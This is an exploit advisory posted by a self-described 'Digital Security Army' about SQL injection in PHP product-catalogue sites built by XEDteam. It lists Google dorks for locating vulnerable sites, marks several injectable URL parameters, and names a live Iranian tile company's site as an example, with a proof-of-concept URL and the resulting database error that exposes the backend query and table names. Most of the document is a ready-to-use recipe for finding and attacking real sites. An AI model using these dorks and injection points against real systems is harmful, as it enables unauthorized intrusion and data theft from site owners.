#################################################################################################
# Exploit Title : Powered By XEDteam راحی و توسعه: گروه زد Iran SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 28/09/2018
# Vendor Homepage : xedteam.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
#################################################################################################
# Google Dork :
intext:''Powered By: XEDteam.''
intext:''طراحی و توسعه: گروه زد.''
inurl:''/index_fa.php'' Powered By: XEDteam.
# Exploit :
/index_fa.php?option=product&task=list&p=[SQL Injection]
/index_fa.php?option=product&task=list&p=-[ID-NUMBER]
&brand=&name=&feature=[SQL Injection]
/index_fa.php?option=product&task=list&p=-[ID-NUMBER]
&brand=&name=&feature=[ID-NUMBER]&type=&size=[SQL Injection]
/index_fa.php?option=product&task=list&p=-[ID-NUMBER]
&brand=&name=&feature=[ID-NUMBER]&type=&size=[ID-NUMBER]&print_type=&glaze=[SQL Injection]
#################################################################################################
# Example Site =>
amintile.ir/index_fa.php?option=product&task=list&p=-1%27 => [ Proof of Concept ] => archive.is/v2AUm
# SQL Database Error =>
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the
right syntax to use near \'-15, 15\' at line 16 SQL=SELECT p.id, IF(gn.value = \'\' OR gn.value IS NULL, n.value, gn.value)
AS name, p.group_id, g.value AS glaze, p.image,\n GROUP_CONCAT(DISTINCT s.width, \'x\', s.height) AS size, p.image,
p.layout,\n pt.value AS print_type\n FROM smb_product AS p\n LEFT JOIN smb_translation AS n ON n.object = p.id AND
n.type = \'product_name\' AND n.language = \'fa\'\n LEFT JOIN smb_translation AS gn ON gn.object = p.id AND gn.type =
\'product_group_name\' AND gn.language = \'fa\'\n LEFT JOIN smb_translation AS g ON g.object = p.glaze_id AND g.type =
\'glaze_name\' AND g.language = \'fa\'\n LEFT JOIN smb_translation AS pt ON pt.object = p.print_type_id AND pt.type =
\'print_type_name\' AND pt.language = \'fa\'\n LEFT JOIN smb_product AS pg ON pg.group_id = p.id AND pg.group_id !=
0\n LEFT JOIN smb_product_sizes AS sz ON sz.product = p.id OR (pg.id IS NOT NULL AND sz.product = pg.id)\n
LEFT JOIN smb_product_size AS s ON s.id = sz.size\n LEFT JOIN smb_product_features AS f ON f.product = p.id\n
WHERE 1=1 AND (p.group_id = 0 OR p.group_id = p.id)\n GROUP BY p.id\n ORDER BY p.ordering\n LIMIT -15, 15
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
